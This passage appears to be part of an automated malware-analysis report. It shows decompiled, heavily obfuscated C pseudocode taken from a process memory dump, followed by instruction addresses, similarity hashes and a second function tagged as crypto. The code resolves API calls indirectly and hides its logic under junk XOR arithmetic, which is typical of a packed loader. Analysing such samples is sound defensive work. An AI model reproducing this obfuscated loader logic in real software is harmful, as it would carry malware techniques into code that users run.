					 *(__ebx + 0x41ce2d) = 0 ^ _t421;
					_t431 = _v20;
				}
				_t578 = _t577 - 0xfffffffc;
				 *_t578 =  *_t578 & 0x00000000;
				 *_t578 =  *_t578 |  *_t577;
				_v20 = 0;
				 *_t578 =  *_t578 ^ _t422 + 0x0041c95a;
				_t336 =  *((intOrPtr*)(_t422 + 0x41f060))(_v20, _t566);
				_v20 = _t467;
				 *(_t422 + 0x41cd3d) = 0 ^ _t336;
				_t470 = _v20;
				 *_t578 =  *_t578 & 0x00000000;
				 *_t578 =  *_t578 ^ _t422 + 0x0041c799;
				 *_t578 =  *_t578 ^ _t431;
				 *_t578 =  *_t578 ^ _t422 + 0x0041d050;
				_t339 =  *((intOrPtr*)(_t422 + 0x41f060))(_t431, _t529);
				_v20 = _t529;
				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) & 0x00000000;
				 *(_t422 + 0x41d0f6) =  *(_t422 + 0x41d0f6) ^ _t529 & 0x00000000 ^ _t339;
				_t532 = _v20;
				_t579 =  &(_t578[1]);
				_v20 = 0;
				 *_t579 =  *_t579 + (_t339 & 0x00000000) +  *_t578;
				_v16 = _v16 & 0x00000000;
				 *_t579 =  *_t579 + _t422 + 0x41c952;
				_v16 = 0;
				 *_t579 =  *_t579 ^ _t422 + 0x0041cbdd;
				_t344 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v16, _v20);
				_v20 = _t532;
				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) & 0x00000000;
				 *(_t422 + 0x41c459) =  *(_t422 + 0x41c459) | _t532 - _v20 | _t344;
				_t535 = _v20;
				_t345 =  *((intOrPtr*)(_t422 + 0x41f068))();
				 *_t579 = _t345;
				_v12 = _v12 & 0x00000000;
				 *_t579 =  *_t579 ^ _t422 + 0x0041c361;
				_v16 = _v16 & 0x00000000;
				 *_t579 =  *_t579 + _t422 + 0x41c569;
				_t348 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12, _v20);
				_v20 = _t470;
				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) & 0x00000000;
				 *(_t422 + 0x41ca96) =  *(_t422 + 0x41ca96) | _t470 & 0x00000000 ^ _t348;
				_t580 =  &(_t579[1]);
				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) & 0x00000000;
				 *(_t422 + 0x41d322) =  *(_t422 + 0x41d322) | _t566 ^  *_t580 |  *_t579;
				_t569 = _t566;
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 + _t422 + 0x41c29c;
				_v16 = 0;
				 *_t580 =  *_t580 + _t422 + 0x41c80d;
				_t353 =  *((intOrPtr*)(_t422 + 0x41f068))(_v16, _v12);
				_v12 = _v20;
				 *((intOrPtr*)(_t422 + 0x41c28c)) = _t353;
				_t476 = _v12;
				 *_t580 = _t497;
				 *_t580 = _t422 + 0x41ce81;
				 *_t580 = _t422 + 0x41cad0;
				_t356 =  *((intOrPtr*)(_t422 + 0x41f068))(_v20, _v20, _v20);
				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) & 0x00000000;
				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) | _t476 ^  *_t580 | _t356;
				_t479 = _t476;
				 *_t580 =  *_t580 - _t497;
				 *_t580 = _t422 + 0x41c333;
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 | _t422 + 0x0041c5ab;
				_t359 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12, _t497);
				 *_t580 = _t359;
				 *_t580 =  *_t580 - _t535;
				 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
				_t361 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12);
				 *_t117 = _t535;
				_t432 = _v16;
				 *_t119 = _t361;
				_v16 = _v16 + _t432;
				_push(_v16);
				_pop(_t362);
				_t499 = _t497;
				_v12 = _t499;
				_t434 = _t432 & 0x00000000 | _t499 ^ _v12 ^  *(_t422 + 0x41ce17);
				_t502 = _v12;
				if(_t434 > _t362) {
					 *_t580 = _t422 + 0x41c5ab;
					_v20 = 0;
					 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
					_t418 =  *((intOrPtr*)(_t422 + 0x41f064))(_v20, _v16);
					_v20 = _t502;
					 *(_t422 + 0x41cc6a) = 0 ^ _t418;
					_t502 = _v20;
				}
				_pop( *_t136);
				 *_t580 = 0 ^ _v16;
				 *_t580 =  *_t580 - _t535;
				 *_t580 =  *_t580 + _t422 + 0x41d2cb;
				 *_t580 =  *_t580 & 0x00000000;
				 *_t580 =  *_t580 | _t422 + 0x0041d0da;
				_t367 =  *((intOrPtr*)(_t422 + 0x41f068))(_t422, _t535, _v16);
				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) & 0x00000000;
				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) | _t434 & 0x00000000 | _t367;
				_t437 = _t434;
				_t368 =  *((intOrPtr*)(_t422 + 0x41f060))();
				 *_t580 = _t368;
				_v16 = 0;
				 *_t580 =  *_t580 ^ _t422 + 0x0041d2e3;
				_t370 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16, _v12);
				_v16 = 0;
				 *_t580 =  *_t580 ^ _t370;
				 *_t580 =  *_t580 & 0x00000000;
				 *_t580 =  *_t580 ^ _t422 + 0x0041cf21;
				_t372 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16);
				 *_t156 = _t569;
				_t439 = (_t437 & 0x00000000) + _v20;
				 *_t158 = _t372;
				_v12 = _v12 + _t439;
				_push(_v12);
				_pop(_t373);
				_t424 = _t422;
				_v20 = _t479;
				_t441 = _t439 & 0x00000000 | _t479 & 0x00000000 |  *(_t424 + 0x41d124);
				_t482 = _v20;
				if(_t441 > _t373) {
					_t165 = _t424 + 0x41d2e3; // 0x41d2e3
					 *_t580 =  *_t580 & 0x00000000;
					 *_t580 =  *_t580 | _t165;
					_t166 = _t424 + 0x41cf21; // 0x41cf21
					 *_t580 = _t166;
					_t415 =  *((intOrPtr*)(_t424 + 0x41f064))(_v20, _t482);
					_v12 = _t441;
					 *(_t424 + 0x41c275) = 0 ^ _t415;
					_t441 = _v12;
				}
				_pop( *_t172);
				_v12 = _v12 & 0x00000000;
				 *_t580 =  *_t580 ^ _v16;
				_t177 = _t424 + 0x41c5c8; // 0x41c5c8
				_v16 = _v16 & 0x00000000;
				 *_t580 =  *_t580 | _t177;
				_t377 =  *((intOrPtr*)(_t424 + 0x41f060))(_v16, _v12);
				_t581 =  &(_t580[1]);
				 *_t182 = _t377;
				_v20 = _v20 + (_t441 & 0x00000000 ^  *_t580);
				_push(_v20);
				_pop(_t378);
				_t537 = _t535;
				 *_t581 = _t537;
				_t444 = 0 ^  *(_t424 + 0x41c106);
				_t540 = 0;
				if(_t444 > _t378) {
					_t187 = _t424 + 0x41c333; // 0x41c333
					_v12 = 0;
					 *_t581 =  *_t581 | _t187;
					_t190 = _t424 + 0x41c5c8; // 0x41c5c8
					 *_t581 =  *_t581 ^ _t444;
					 *_t581 = _t190;
					_t378 =  *((intOrPtr*)(_t424 + 0x41f064))(_t444, _v12);
				}
				_v16 = _t540;
				 *((intOrPtr*)(_t424 + 0x41c594)) = _t378;
				_t543 = _v16;
				_t446 = _t444 & 0x00000000 ^ (_t424 ^  *_t581 | _a4);
				_t427 = _t424;
				_v12 = 0;
				 *_t581 =  *_t581 + _t446;
				_t198 = _t427 + 0x41ccb8; // 0x41ccb8
				_v12 = 0;
				 *_t581 =  *_t581 | _t198;
				_t380 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _v12);
				_v20 = _t446;
				 *((intOrPtr*)(_t427 + 0x41cb42)) = _t380;
				_pop( *_t205);
				_t504 = _t502 & 0x00000000 | _t482 -  *_t581 | _v16;
				_t485 = _t482;
				_t207 = _t427 + 0x41d2a5; // 0x41d2a5
				 *_t581 =  *_t581 ^ _t504;
				 *_t581 =  *_t581 ^ _t207;
				_t382 =  *((intOrPtr*)(_t427 + 0x41f060))(_t504);
				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) & 0x00000000;
				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) | _t504 & 0x00000000 ^ _t382;
				_t507 = _t504;
				_t572 = _t569;
				_t213 = _t427 + 0x41c4f4; // 0x41c4f4
				_v16 = _v16 & 0x00000000;
				 *_t581 =  *_t581 | _t213;
				_t217 = _t427 + 0x41c4e9; // 0x41c4e9
				 *_t581 =  *_t581 ^ _t485;
				 *_t581 = _t217;
				_t385 =  *((intOrPtr*)(_t427 + 0x41f068))(_t485, _v16);
				_v12 = _t543;
				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) & 0x00000000;
				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) ^ (_t543 ^ _v12 | _t385);
				_t546 = _v12;
				_v16 = _t485;
				_v8 = _t507;
				_t229 = _t427 + 0x41c0f6; // 0x41c0f6
				 *_t581 = _t229;
				_t387 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20);
				 *_t581 = _t387;
				_t233 = _t427 + 0x41c3d8; // 0x41c3d8
				_v20 = _v20 & 0x00000000;
				 *_t581 =  *_t581 ^ _t233;
				_t389 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _v12);
				_t453 =  *_t581;
				_t582 =  &(_t581[1]);
				 *_t582 =  *_t582 + _v16;
				_t489 = _t389;
				_t390 = _t489 + _t453;
				_t491 = 0;
				_t455 = _t453 & 0x00000000 ^ _t507 -  *_t582 ^  *(_t427 + 0x41ce7d);
				_t510 = _t507;
				if(_t455 > _t390) {
					_t239 = _t427 + 0x41c0f6; // 0x41c0f6
					_v12 = 0;
					 *_t582 =  *_t582 ^ _t239;
					_t242 = _t427 + 0x41c3d8; // 0x41c3d8
					 *_t582 =  *_t582 & 0x00000000;
					 *_t582 =  *_t582 + _t242;
					_t390 =  *((intOrPtr*)(_t427 + 0x41f064))(_t491, _v12);
				}
				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) & 0x00000000;
				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) | _t546 ^  *_t582 | _t390;
				_t549 = _t546;
				_t248 = _t427 + 0x41c2c4; // 0x41c2c4
				_v12 = 0;
				 *_t582 =  *_t582 | _t248;
				_t392 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, 0);
				_v12 = _t510;
				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) & 0x00000000;
				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) | _t510 - _v12 ^ _t392;
				_t513 = _v12;
				 *((intOrPtr*)(_t427 + 0x41f080))();
				 *_t582 =  *_t582 & 0x00000000;
				 *_t582 =  *_t582 ^ _t455;
				_t260 = _t427 + 0x41d1a0; // 0x41d1a0
				_v12 = _v12 & 0x00000000;
				 *_t582 =  *_t582 ^ _t260;
				_t395 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _t572);
				_v12 = _t491;
				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) & 0x00000000;
				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) | _t491 - _v12 | _t395;
				_t494 = _v12;
				_pop( *_t272);
				_t456 = _v20;
				do {
					_v8 = _v8 - 1;
					 *_t582 =  *_t582 & 0x00000000;
					 *_t582 =  *_t582 + _t456;
					_t276 = _t427 + 0x41ccae; // 0x41ccae
					_v20 = 0;
					 *_t582 =  *_t582 + _t276;
					_t397 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _t572);
					_v16 = _v16 & 0x00000000;
					 *_t582 =  *_t582 + _t397;
					_t283 = _t427 + 0x41c045; // 0x41c045
					 *_t582 = _t283;
					_t399 =  *((intOrPtr*)(_t427 + 0x41f060))(_v16, _v16);
					_pop( *_t286);
					_t457 = _v20;
					_v12 = _t549;
					_push(_t457 + _t399);
					_t552 = _v12;
					_pop(_t400);
					_t572 = _t572;
					if((_t457 & 0x00000000 | _t572 & 0x00000000 ^  *(_t427 + 0x41c40d)) > _t400) {
						_t291 = _t427 + 0x41ccae; // 0x41ccae
						_v12 = _v12 & 0x00000000;
						 *_t582 =  *_t582 | _t291;
						_t295 = _t427 + 0x41c045; // 0x41c045
						_v12 = 0;
						 *_t582 =  *_t582 ^ _t295;
						_t400 =  *((intOrPtr*)(_t427 + 0x41f064))(_v12, _v12);
						_v16 = _t552;
						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) & 0x00000000;
						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) | _t552 & 0x00000000 ^ _t400;
						_t552 = _v16;
					}
					_t461 =  *_t582;
					_t583 =  &(_t582[1]);
					_v20 = _t552;
					_v12 = _v20;
					_t516 = _a4 + (_t513 & 0x00000000 ^ (_t552 & 0x00000000 | _t461));
					_v20 = _v20 & 0x00000000;
					_push(_v20);
					 *_t583 =  *_t583 | _t461;
					_v16 = _t400;
					_push(_a8 + _t516 + 1);
					_pop(_t518);
					_push(_v12);
					_pop(_t561);
					 *((intOrPtr*)(_t427 + 0x41f0c0))();
					_t549 =  *_t583;
					 *_t583 = _v8;
					 *_t583 =  *_t583 & 0x00000000;
					 *_t583 =  *_t583 + (_t518 | _a4) + 1;
					_t513 =  *_t583;
					 *_t583 = _a8;
					E033331B3(_t427, _t494, _t513, _t549, (_t518 | _a4) + 1, _t572, _t561);
					_t456 =  *_t583;
					_t582 = _t583 - 0xfffffffc;
				} while (_v8 != 0);
				_pop( *_t323);
				return 0;
			}

0x03331cd0
0x03331cd0
0x03331cd0
0x03331cd1
0x03331cd5
0x03331cd8
0x03331cda
0x03331ce3
0x03331cea
0x03331ced
0x03331cf0
0x03331cf6
0x03331cfc
0x03331d03
0x03331d09
0x03331d10
0x03331d11
0x03331d15
0x03331d1e
0x03331d21
0x03331d24
0x03331d2a
0x03331d2b
0x03331d2e
0x03331d37
0x03331d38
0x03331d3b
0x03331d3e
0x03331d4a
0x03331d50
0x03331d54
0x03331d57
0x03331d5a
0x03331d5d
0x03331d5e
0x03331d5f
0x03331d65
0x03331d68
0x03331d6b
0x03331d6e
0x03331d76
0x03331d7d
0x03331d80
0x03331d89
0x03331d8c
0x03331d8f
0x03331d95
0x03331d9c
0x03331da2
0x03331da2
0x03331daa
0x03331dae
0x03331db2
0x03331dbb
0x03331dc5
0x03331dc8
0x03331dce
0x03331dd5
0x03331ddb
0x03331de5
0x03331de9
0x03331df3
0x03331df6
0x03331df9
0x03331dff
0x03331e07
0x03331e0e
0x03331e14
0x03331e20
0x03331e23
0x03331e2d
0x03331e36
0x03331e3d
0x03331e46
0x03331e50
0x03331e53
0x03331e59
0x03331e61
0x03331e68
0x03331e6e
0x03331e71
0x03331e7a
0x03331e83
0x03331e8a
0x03331e93
0x03331e9a
0x03331e9d
0x03331ea3
0x03331eab
0x03331eb2
0x03331ec0
0x03331ec9
0x03331ed0
0x03331ed6
0x03331edd
0x03331ee4
0x03331eed
0x03331ef7
0x03331efa
0x03331f00
0x03331f07
0x03331f0d
0x03331f13
0x03331f1f
0x03331f2b
0x03331f2e
0x03331f3a
0x03331f41
0x03331f47
0x03331f4f
0x03331f52
0x03331f5b
0x03331f62
0x03331f65
0x03331f6e
0x03331f78
0x03331f7b
0x03331f7e
0x03331f84
0x03331f87
0x03331f8e
0x03331f91
0x03331f94
0x03331f97
0x03331f98
0x03331f99
0x03331fa8
0x03331faa
0x03331faf
0x03331fba
0x03331fc3
0x03331fcd
0x03331fd0
0x03331fd6
0x03331fdd
0x03331fe3
0x03331fe3
0x03331fe8
0x03331ff1
0x03331ffb
0x03331ffe
0x03332008
0x0333200c
0x0333200f
0x0333201b
0x03332022
0x03332028
0x03332029
0x03332032
0x0333203b
0x03332045
0x03332048
0x0333204e
0x03332058
0x03332062
0x03332066
0x03332069
0x03332075
0x03332078
0x0333207f
0x03332082
0x03332085
0x03332088
0x03332089
0x0333208a
0x03332099
0x0333209b
0x033320a0
0x033320a2
0x033320a9
0x033320ad
0x033320b0
0x033320b9
0x033320bc
0x033320c2
0x033320c9
0x033320cf
0x033320cf
0x033320d4
0x033320da
0x033320e1
0x033320e4
0x033320ea
0x033320f1
0x033320f4
0x03332103
0x0333210a
0x0333210d
0x03332110
0x03332113
0x03332114
0x03332117
0x03332122
0x03332124
0x03332127
0x03332129
0x0333212f
0x03332139
0x0333213c
0x03332143
0x03332146
0x03332149
0x03332149
0x0333214f
0x03332156
0x0333215c
0x03332169
0x0333216b
0x0333216c
0x03332176
0x03332179
0x0333217f
0x03332189
0x0333218c
0x03332192
0x03332199
0x033321a2
0x033321b1
0x033321b3
0x033321b4
0x033321bb
0x033321be
0x033321c1
0x033321cd
0x033321d4
0x033321da
0x033321e2
0x033321e3
0x033321e9
0x033321f0
0x033321f3
0x033321fa
0x033321fd
0x03332200
0x03332206
0x0333220e
0x03332215
0x0333221b
0x0333221e
0x03332225
0x0333222b
0x03332234
0x03332237
0x03332240
0x03332243
0x03332249
0x03332250
0x03332253
0x0333225b
0x0333225e
0x03332263
0x03332267
0x0333226a
0x0333226c
0x0333227a
0x0333227c
0x0333227f
0x03332281
0x03332287
0x03332291
0x03332294
0x0333229b
0x0333229f
0x033322a2
0x033322a2
0x033322ae
0x033322b5
0x033322bb
0x033322be
0x033322c4
0x033322ce
0x033322d1
0x033322d7
0x033322df
0x033322e6
0x033322ec
0x033322ef
0x033322f6
0x033322fa
0x033322fd
0x03332303
0x0333230a
0x0333230d
0x03332313
0x0333231b
0x03332322
0x03332328
0x0333232b
0x0333232e
0x03332331
0x03332331
0x03332335
0x03332339
0x0333233c
0x03332342
0x0333234c
0x0333234f
0x03332355
0x0333235c
0x0333235f
0x03332368
0x0333236b
0x03332371
0x03332374
0x03332377
0x0333237e
0x0333237f
0x03332382
0x03332392
0x03332395
0x03332397
0x0333239d
0x033323a4
0x033323a7
0x033323ad
0x033323b7
0x033323ba
0x033323c0
0x033323c8
0x033323cf
0x033323d5
0x033323d5
0x033323da
0x033323dd
0x033323e0
0x033323f0
0x033323fc
0x033323fe
0x03332402
0x03332405
0x03332408
0x03332410
0x03332414
0x03332415
0x0333241d
0x0333241f
0x03332429
0x03332429
0x0333242d
0x03332431
0x03332438
0x03332438
0x0333243b
0x03332442
0x03332445
0x03332448
0x0333245d
0x03332464

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
Instruction ID: 731a6e28d9e3fb5388c9ebf088198c4ea0ae476e7ee6619b4f4ed690fbdfedda
Opcode Fuzzy Hash: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
Instruction Fuzzy Hash: 2B420672C44218EFEF049FA0C8897EEBBF5FF48321F0584AAD899AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 033343D8, Relevance: .4, Instructions: 371
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E033343D8(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t202;
				void* _t204;
				signed int _t205;
				signed int _t210;
				void* _t212;
				void* _t213;
				signed int _t217;
				signed int _t220;
				signed int _t223;
				signed int _t228;
				void* _t230;
				void* _t232;
				intOrPtr _t233;
				void _t236;
				signed int _t240;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t261;
				signed int _t264;
				signed int _t266;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				void* _t286;
				signed int _t293;
				signed int _t294;
				signed int _t305;
				signed int _t306;
				signed int _t311;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t330;
				signed int _t334;
				signed int _t337;
				signed int _t340;
				signed int _t343;
				void* _t348;
				signed int _t355;
				signed int _t358;
				signed int _t363;
				void* _t364;
				signed int _t366;
				signed int _t369;
				signed int* _t370;
				signed int* _t371;
				signed int* _t372;
				signed int* _t373;
				signed int* _t374;
				signed int* _t375;
				signed int* _t376;
				signed int* _t377;

				_t355 = __esi;
				_t337 = __edi;
				 *_t370 =  *_t370 - _t366;
				 *_t370 = __ebx + 0x41c5e4;
				_t202 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t366 - 0x1c) = 0;
				_push( *(_t366 - 0x1c));
				 *_t370 =  *_t370 + _t202;
				_push(__edi);
				 *_t370 =  *_t370 ^ __edi;
				 *_t370 =  *_t370 | __ebx + 0x0041c129;
				_t204 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_t274 = (__ecx & 0x00000000) +  *_t370;
				_t371 = _t370 - 0xfffffffc;
				 *(_t366 - 0x1c) = __ebx;
				_push(_t274 + _t204);
				_t261 =  *(_t366 - 0x1c);
				_pop(_t205);
				_push(__edx);
				_t276 = _t274 & 0x00000000 | __edx ^  *_t371 |  *(_t261 + 0x41c62b);
				_pop(_t305);
				if(_t276 > _t205) {
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 ^ _t261 + 0x0041c5e4;
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 + _t261 + 0x41c129;
					_t205 =  *((intOrPtr*)(_t261 + 0x41f064))(_t366, __esi);
				}
				 *_t371 = _t355;
				 *(_t261 + 0x41d040) = 0 ^ _t205;
				_t358 = 0;
				if( *((intOrPtr*)(_t366 - 0x10)) == 4) {
					_t15 = _t261 + 0x41d1be; // 0x41d1be
					 *_t371 = _t15;
					_t17 = _t261 + 0x41c0a8; // 0x41c0a8
					 *_t371 =  *_t371 & 0x00000000;
					 *_t371 =  *_t371 ^ _t17;
					_push( *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24)));
					_pop( *_t19);
					_push( *(_t366 - 0x20));
					_pop( *_t21);
					 *((intOrPtr*)(_t366 - 8)) = 1;
					_t23 = _t261 + 0x41c6f8; // 0x41c6f8
					 *(_t366 - 0x20) =  *(_t366 - 0x20) & 0x00000000;
					 *_t371 =  *_t371 ^ _t23;
					_t251 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x20));
					 *(_t366 - 0x20) = _t305;
					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) & 0x00000000;
					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) | _t305 ^  *(_t366 - 0x20) | _t251;
					_t334 =  *(_t366 - 0x20);
					 *((intOrPtr*)(_t366 - 0xc)) = 0x55;
					_t36 = _t261 + 0x41c356; // 0x41c356
					 *(_t366 - 0x1c) =  *(_t366 - 0x1c) & 0x00000000;
					 *_t371 =  *_t371 | _t36;
					_t253 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x1c));
					 *(_t366 - 0x24) = _t337;
					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) & 0x00000000;
					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) | _t337 & 0x00000000 ^ _t253;
					_t337 =  *(_t366 - 0x24);
					 *((intOrPtr*)(_t366 - 0x18)) = 2;
					_t48 = _t261 + 0x41cc3e; // 0x41cc3e
					 *(_t366 - 0x24) =  *(_t366 - 0x24) & 0x00000000;
					 *_t371 =  *_t371 ^ _t48;
					_t52 = _t261 + 0x41cf5b; // 0x41cf5b
					 *_t371 =  *_t371 ^ _t358;
					 *_t371 = _t52;
					_t205 =  *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24));
					 *(_t366 - 0x20) = _t334;
					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) & 0x00000000;
					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) | _t334 & 0x00000000 | _t205;
					_t305 =  *(_t366 - 0x20);
				}
				_t306 = _t305 ^ _t305;
				 *_t371 =  *_t371 - _t337;
				 *_t371 = _t306;
				_t60 = _t261 + 0x41c61d; // 0x41c61d
				 *_t371 =  *_t371 ^ _t358;
				 *_t371 = _t60;
				_t210 =  *((intOrPtr*)(_t261 + 0x41f060))(_t358, _t337, _t205);
				 *_t371 = _t210;
				_t63 = _t261 + 0x41cf67; // 0x41cf67
				 *(_t366 - 0x24) = 0;
				 *_t371 =  *_t371 ^ _t63;
				_t212 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x24),  *(_t366 - 0x1c));
				_pop( *_t67);
				_t278 = _t276 & 0x00000000 ^  *(_t366 - 0x24);
				 *(_t366 - 0x24) = _t337;
				_push(_t278 + _t212);
				_t340 =  *(_t366 - 0x24);
				_pop(_t213);
				_t280 = _t278 & 0x00000000 | _t366 & 0x00000000 ^  *(_t261 + 0x41c5dc);
				_t369 = _t366;
				if(_t280 > _t213) {
					_t72 = _t261 + 0x41c61d; // 0x41c61d
					 *(_t369 - 0x1c) = 0;
					 *_t371 =  *_t371 ^ _t72;
					_t75 = _t261 + 0x41cf67; // 0x41cf67
					 *(_t369 - 0x20) = 0;
					 *_t371 =  *_t371 | _t75;
					_t246 =  *((intOrPtr*)(_t261 + 0x41f064))( *(_t369 - 0x20),  *(_t369 - 0x1c));
					 *(_t369 - 0x1c) = _t280;
					 *((intOrPtr*)(_t261 + 0x41cf4f)) = _t246;
					_t280 =  *(_t369 - 0x1c);
				}
				_t372 =  &(_t371[1]);
				 *_t372 = _t280;
				_t283 = 0;
				 *_t372 = _t306 & 0x00000000 |  *_t371;
				_t84 = _t261 + 0x41cef6; // 0x41cef6
				 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
				 *_t372 =  *_t372 | _t84;
				_t88 = _t261 + 0x41ceb9; // 0x41ceb9
				 *_t372 =  *_t372 ^ _t369;
				 *_t372 =  *_t372 ^ _t88;
				_t217 =  *((intOrPtr*)(_t261 + 0x41f068))(_t369,  *(_t369 - 0x1c),  *(_t369 - 0x24));
				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) & 0x00000000;
				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) | _t283 ^  *_t372 | _t217;
				_t286 = _t283;
				_t373 = _t372 - 0xfffffffc;
				_t311 = _t217 %  *(_t369 - 0x18);
				 *_t373 =  *_t373 & 0x00000000;
				 *_t373 =  *_t373 | _t311;
				_t100 = _t261 + 0x41c52d; // 0x41c52d
				 *(_t369 - 0x24) = 0;
				 *_t373 =  *_t373 ^ _t100;
				_t220 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24), _t286);
				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) & 0x00000000;
				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) | _t311 & 0x00000000 | _t220;
				_t314 = _t311;
				_t316 = _t314 & 0x00000000 ^  *_t373;
				_t374 = _t373 - 0xfffffffc;
				 *((intOrPtr*)(_t369 - 4)) =  *((intOrPtr*)(_t369 - 4)) - _t316;
				 *(_t369 - 0x24) = 0;
				 *_t374 =  *_t374 | _t316;
				_t112 = _t261 + 0x41c7ee; // 0x41c7ee
				 *_t374 =  *_t374 ^ _t340;
				 *_t374 =  *_t374 ^ _t112;
				_t113 = _t261 + 0x41c513; // 0x41c513
				 *(_t369 - 0x20) = 0;
				 *_t374 =  *_t374 | _t113;
				_t223 =  *((intOrPtr*)(_t261 + 0x41f068))( *(_t369 - 0x20), _t340,  *(_t369 - 0x24), _t286);
				 *(_t369 - 0x20) = _t358;
				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) & 0x00000000;
				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) ^ _t358 & 0x00000000 ^ _t223;
				_t318 =  *_t374;
				_t375 =  &(_t374[1]);
				 *(_t369 - 0x1c) = _t223;
				 *(_t369 - 0x14) =  *(_t369 - 0x14) & 0x00000000;
				 *(_t369 - 0x14) =  *(_t369 - 0x14) | _t223 ^  *(_t369 - 0x1c) ^ _t318;
				_t130 = _t261 + 0x41ccc7; // 0x41ccc7
				 *(_t369 - 0x24) = 0;
				 *_t375 =  *_t375 | _t130;
				_t228 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24));
				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) & 0x00000000;
				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) | _t340 -  *_t375 | _t228;
				_t343 = _t340;
				_t363 =  *(_t369 - 0x20) & 0x00000000 ^ _t261 & 0x00000000 ^  *(_t369 + 8);
				_t264 = _t261;
				_t139 = _t264 + 0x41c550; // 0x41c550
				 *(_t369 - 0x20) = 0;
				 *_t375 =  *_t375 + _t139;
				_t230 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20));
				 *(_t369 - 0x20) = 0;
				 *_t375 =  *_t375 + _t230;
				_t145 = _t264 + 0x41d34c; // 0x41d34c
				 *_t375 = _t145;
				_t232 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20),  *(_t369 - 0x20));
				_t376 = _t375 - 0xfffffffc;
				 *_t148 = _t232;
				 *(_t369 - 0x24) =  *(_t369 - 0x24) + (0 ^  *_t375);
				_push( *(_t369 - 0x24));
				_pop(_t233);
				_t320 = _t318;
				 *(_t369 - 0x1c) = _t320;
				_t323 =  *(_t369 - 0x1c);
				if( *((intOrPtr*)(_t264 + 0x41ccf8)) > _t233) {
					_t155 = _t264 + 0x41c550; // 0x41c550
					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
					 *_t376 =  *_t376 + _t155;
					_t159 = _t264 + 0x41d34c; // 0x41d34c
					 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
